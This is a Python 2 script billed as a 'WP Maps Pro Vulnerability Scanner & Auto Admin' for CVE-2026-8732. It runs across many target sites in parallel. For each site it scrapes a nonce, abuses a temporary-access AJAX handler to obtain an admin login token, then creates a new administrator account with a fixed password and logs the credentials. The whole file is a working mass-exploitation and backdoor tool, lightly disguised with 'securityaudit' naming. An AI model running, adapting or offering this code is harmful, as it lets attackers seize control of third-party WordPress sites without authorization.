# -*- coding: utf-8 -*- import sys import re import threading import json import time from Queue import Queue import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) TIMEOUT = 10 TOTAL_THREAD = 10 OUTPUT_FILE = "res.txt" ADMIN_FILE = "admin_created.txt" BASE_USERNAME = "securityaudit" NEW_PASSWORD = "StrongP@ssw0rd123!" NEW_EMAIL = "audit@example.com" print_lock = threading.Lock() file_lock = threading.Lock() HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', } def get_nonce(url): try: session = requests.Session() session.headers.update(HEADERS) resp = session.get(url, timeout=TIMEOUT, verify=False) html = resp.text match = re.search(r'wpgmp_local.*?"nonce":"([^"]+)"', html, re.DOTALL) if match: return match.group(1) match = re.search(r'fc-call-nonce["\']?\s*:\s*["\']([^"\']+)', html) if match: return match.group(1) return None except Exception: return None def simpan_hasil(url, token, redirect_url=None): with file_lock: try: with open(OUTPUT_FILE, 'a') as f: f.write("domain : %s\n" % url) f.write("token full : %s\n" % token) if redirect_url: f.write("redirect url : %s\n" % redirect_url) f.write("\n") except IOError as e: with print_lock: print "[-] Failed to write to output file: %s" % str(e) def simpan_admin(url, username, password, email): with file_lock: try: with open(ADMIN_FILE, 'a') as f: f.write("=== Admin Created ===\n") f.write("Domain: %s/wp-admin/\n" % url) f.write("Username: %s\n" % username) f.write("Password: %s\n" % password) f.write("Email: %s\n" % email) f.write("-------------------------------\n\n") except IOError as e: with print_lock: print "[-] Failed to save admin info: %s" % str(e) def extract_token_and_url(response_text): try: data = json.loads(response_text) if 'url' in data: full_url = data['url'] match = re.search(r'[?&]wpmp_token=([^&]+)', full_url) if match: return match.group(1), full_url match = re.search(r'token=([^&]+)', full_url) if match: return match.group(1), full_url if 'token' in data: return data['token'], None if 'access_token' in data: return data['access_token'], None except: pass match = re.search(r'wpmp_token=([a-f0-9]+)', response_text) if match: token = match.group(1) url_match = re.search(r'(https?://[^\s"\']+wp-admin[^\s"\']*)', response_text) if url_match: return token, url_match.group(1) return token, None match = re.search(r'["\']token["\']\s*:\s*["\']([^"\']+)', response_text) if match: return match.group(1), None match = re.search(r'["\']access_token["\']\s*:\s*["\']([^"\']+)', response_text) if match: return match.group(1), None if re.match(r'^[a-f0-9]{32,}$', response_text.strip()): return response_text.strip(), None return None, None def create_admin_user(session, base_url, username, password, email): try: admin_url = base_url.rstrip('/') + '/wp-admin/user-new.php' headers = HEADERS.copy() headers['Referer'] = base_url + '/wp-admin/' resp = session.get(admin_url, headers=headers, timeout=TIMEOUT, verify=False) if resp.status_code != 200: return False, "Cannot access user-new.php (status %d)" % resp.status_code html = resp.text nonce_match = re.search(r'name="_wpnonce_create-user" value="([^"]+)"', html) if not nonce_match: nonce_match = re.search(r'id="_wpnonce_create-user"[^>]+value="([^"]+)"', html) if not nonce_match: return False, "Cannot find create-user nonce" create_nonce = nonce_match.group(1) submit_match = re.search(r']*type="submit"[^>]*name="createuser"[^>]*value="([^"]+)"', html) submit_value = "Add New User" if submit_match: submit_value = submit_match.group(1) data = { 'action': 'createuser', '_wpnonce_create-user': create_nonce, '_wp_http_referer': '/wp-admin/user-new.php', 'user_login': username, 'email': email, 'first_name': '', 'last_name': '', 'url': '', 'pass1': password, 'pass2': password, 'role': 'administrator', 'createuser': submit_value } post_headers = headers.copy() post_headers['Content-Type'] = 'application/x-www-form-urlencoded' post_resp = session.post(admin_url, data=data, headers=post_headers, timeout=TIMEOUT, verify=False, allow_redirects=False) if post_resp.status_code == 302: location = post_resp.headers.get('Location', '') if 'users.php' in location: return True, "Admin created (redirect)" check_resp = session.get(base_url + '/wp-admin/users.php', timeout=TIMEOUT, verify=False) if check_resp.status_code == 200 and username in check_resp.text: return True, "Admin created (user appears in users list)" return False, "No redirect and user not found" except Exception as e: return False, "Exception: %s" % str(e) def check_vulnerability(url): url = url.strip() if not url: return if not url.startswith('http://') and not url.startswith('https://'): url = 'https://' + url url = url.rstrip('/') with print_lock: print "[*] Checking: %s" % url nonce = get_nonce(url) if not nonce: with print_lock: print "[-] %s -> Failed to get nonce" % url return ajax_url = url + "/wp-admin/admin-ajax.php" payload = { 'action': 'wpgmp_temp_access_ajax', 'nonce': nonce, 'handler': 'wpgmp_temp_access_support', 'check_temp': 'false' } post_headers = HEADERS.copy() post_headers.update({ 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': url, 'Referer': url + '/', 'X-Requested-With': 'XMLHttpRequest' }) try: session = requests.Session() session.headers.update(post_headers) resp = session.post(ajax_url, data=payload, timeout=TIMEOUT, verify=False) response_text = resp.text token, redirect_url = extract_token_and_url(response_text) if token: with print_lock: print "[VULNERABLE] %s -> Token found" % url simpan_hasil(url, token, redirect_url) if redirect_url: with print_lock: print "[*] %s -> Accessing redirect URL..." % url try: session.get(redirect_url, timeout=TIMEOUT, verify=False) except: pass unique_username = "%s_%d" % (BASE_USERNAME, int(time.time())) success, message = create_admin_user(session, url, unique_username, NEW_PASSWORD, NEW_EMAIL) if success: with print_lock: print "[+] %s -> Admin created: %s / %s" % (url, unique_username, NEW_PASSWORD) simpan_admin(url, unique_username, NEW_PASSWORD, NEW_EMAIL) else: with print_lock: print "[-] %s -> Failed to create admin: %s" % (url, message) else: with print_lock: print "[-] %s -> No token" % url except Exception as e: with print_lock: print "[-] %s -> Error: %s" % (url, str(e)) def worker(q): while not q.empty(): target = q.get() try: check_vulnerability(target) except Exception: pass finally: q.task_done() def main(): banner = """ ============================================ WP Maps Pro Vulnerability Scanner & Auto Admin CVE-2026-8732 =========================================== """ print banner if len(sys.argv) < 2: print "Usage: python mass_audit.py [target_list.txt]" sys.exit(1) target_file = sys.argv[1] try: with open(target_file, 'r') as f: targets = [line.strip() for line in f if line.strip()] except IOError: print "[-] File %s not found!" % target_file sys.exit(1) print "[*] Starting scan on %d targets using %d threads..." % (len(targets), TOTAL_THREAD) print "[*] Valid results saved to: %s" % OUTPUT_FILE print "[*] Admin credentials saved to: %s" % ADMIN_FILE print "[*] New admin username: %s_, password: %s\n" % (BASE_USERNAME, NEW_PASSWORD) q = Queue() for target in targets: q.put(target) threads = [] for i in range(TOTAL_THREAD): t = threading.Thread(target=worker, args=(q,)) t.daemon = True t.start() threads.append(t) q.join() print "\n[*] Scan finished. Check %s and %s" % (OUTPUT_FILE, ADMIN_FILE) if __name__ == "__main__": main()